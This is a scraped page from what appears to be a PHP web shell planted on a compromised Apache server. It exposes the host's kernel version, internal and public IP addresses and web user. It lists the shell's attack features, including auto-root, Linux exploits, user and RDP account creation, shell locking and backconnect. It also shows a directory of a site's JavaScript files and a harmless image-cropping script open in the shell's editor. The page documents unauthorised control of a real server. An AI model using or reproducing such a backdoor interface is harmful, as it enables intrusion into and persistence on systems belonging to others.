Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.118.19.247
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
PrathibhaKaranji_stop /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
pg
[ DIR ]
drwxr-xr-x
.DS_Store
7.99
KB
-rwxr-xr-x
MainPageCompressed.js
341.08
KB
-rwxr-xr-x
admin.js
15.25
KB
-rwxr-xr-x
advanced-form-elements.js
5.53
KB
-rwxr-xr-x
bcuregn.js
6.94
KB
-rwxr-xr-x
compressed.js
440.45
KB
-rwxr-xr-x
control.js
18.43
KB
-rwxr-xr-x
demo.js
3.33
KB
-rwxr-xr-x
forgot-password.js
3.24
KB
-rwxr-xr-x
form_submit.js
1.3
KB
-rwxr-xr-x
helpers.js
576
B
-rwxr-xr-x
kusPhdAdm.js
21.78
KB
-rwxr-xr-x
kusPhdAdm_24092018.js
29.74
KB
-rwxr-xr-x
login.js
478
B
-rwxr-xr-x
photoCrop.js
1.91
KB
-rwxr-xr-x
script.js
3
B
-rwxr-xr-x
sign-in.js
4.29
KB
-rwxr-xr-x
sign-up.js
3.65
KB
-rwxr-xr-x
upload.js
5.54
KB
-rwxr-xr-x
validate.js
9.29
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : photoCrop.js
Dropzone.options.myDropzone = { url: '/post', transformFile: function (file, done) { var myDropZone = this; // Create the image editor overlay var editor = document.createElement('div'); editor.style.position = 'fixed'; editor.style.left = 0; editor.style.right = 0; editor.style.top = 0; editor.style.bottom = 0; editor.style.zIndex = 9999; editor.style.backgroundColor = '#000'; // Create the confirm button var confirm = document.createElement('button'); confirm.style.position = 'absolute'; confirm.style.left = '10px'; confirm.style.top = '10px'; confirm.style.zIndex = 9999; confirm.textContent = 'Confirm'; confirm.addEventListener('click', function () { // Get the canvas with image data from Cropper.js var canvas = cropper.getCroppedCanvas({ width: 256, height: 256 }); // Turn the canvas into a Blob (file object without a name) canvas.toBlob(function (blob) { // Update the image thumbnail with the new image data myDropZone.createThumbnail( blob, myDropZone.options.thumbnailWidth, myDropZone.options.thumbnailHeight, myDropZone.options.thumbnailMethod, false, function (dataURL) { // Update the Dropzone file thumbnail myDropZone.emit('thumbnail', file, dataURL); // Return modified file to dropzone done(blob); } ); }); // Remove the editor from view editor.parentNode.removeChild(editor); }); editor.appendChild(confirm); // Load the image var image = new Image(); image.src = URL.createObjectURL(file); editor.appendChild(image); // Append the editor to the page document.body.appendChild(editor); // Create Cropper.js and pass image var cropper = new Cropper(image, { aspectRatio: 1 }); } };
Close